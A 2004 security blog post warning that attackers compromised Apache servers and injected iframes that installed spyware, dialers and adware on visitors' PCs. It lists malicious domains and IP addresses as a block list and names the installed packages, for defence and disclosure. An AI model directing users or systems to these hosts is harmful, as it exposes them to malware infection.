Categories

BitTorrent
Conferences
Direct Revenue
Julie Amero
Myspace
Podcasts
Postbag
The Big Ones
The Fourth Wall
Yapbrowser
Zango

Creative Commons License
All articles licensed
under a Creative
Commons License.  








Home | About me | Press | The Fourth Wall | Links

Saturday, November 20, 2004

Major Hack Attack Discovered: 8MB of infections and DOS Attack.

DOWNLOAD:

Download the complete rundown in PDF format - detailing the server exploit, the packet injection process, the malware downloads, infected sites, how to protect your server and desktop PC:

Xpire/Splitinfinity Exploit: Server hack / Malware install analysis

Mirror, kindly hosted by Spywarewarrior.com

We have discovered that a group of hackers (perhaps even a criminal gang) is hacking web servers all over the Net and installing root kits that dynamically inject code into the pages served from the compromised web servers. The injected code effectively serves as a "front door" to a number of different pages at these domains:

sp2fucked.biz
splitinfinity.info
xpire.info

Similar to Download_Ject, only this time it works on Apache Servers rather than Windows.

Using Iframes, a number of sites install anything up to 8MB worth of exploits on a users machine - viruses, trojans, scripts, malware packages - you name it, you'll end up with it.

Several other domains are used in that installation/exploit process, including:

69.50.168.147
195.178.160.30
213.159.117.133
b00gle.info
coolsearch.biz
newiframe.biz
pizdato.biz

Fair warning: do NOT visit any of these domains unless your box is well defended and updated, and you are prepared to deal with the unexpected.

The software installed on a users' PCs appears to vary. Sometimes the exploit pages listed above push porn dialers onto victims' PCs; other times a whole host of spyware and adware packages is installed. The packages that we've seen installed via this exploit include:

180solutions
BlazeFind
BookedSpace
BullsEye Networks
CashBack (Bargain Buddy)
ClickSpring
CoolWebSearch
DyFuca
Hoost
IBIS Toolbar
Internet Optimizer
ISTbar
Power Scan
SideFind
TIB Browser
WebRebates (TopMoxie)
Window AdControl
WindUpdates
YourSiteBar

There have been a few other public discussion threads on the Net about this exploit. In particular, see:

Spyware Warrior Weblog

Ben Edelman.org

DSL Reports

The worst thing is, these malware installations are just a front for massive sets of zombie boxes, and they're getting ready to point them somewhere. If you're an admin of an Apache box, PLEASE ensure that you are fully patched, especially in the area of OpenSSL exlpoits.

More will likely be made public in the coming weeks, but the infection is making its way round many home users PCs, and if you end up being hijacked, nothing short of a reformat will remove the garbage from your system.

IE-Spyad will block the domains listed:

https://netfiles.uiuc.edu/ehowes/www/resource.htm

We will be posting regular updates on this as we get them - please keep checking back for more information.

Paperghost

Please help spread the word by placing a link to this article on your sites. As much exposure as possible is needed here.

Labels:

posted by paperghost at 2:10 PM | Digg it!

All Content © Vitalsecurity.org 2006. The content of this site is entirely the opinion of Paperghost, and is in no way endorsed by FaceTime Communications. In other words - have a problem, come see me.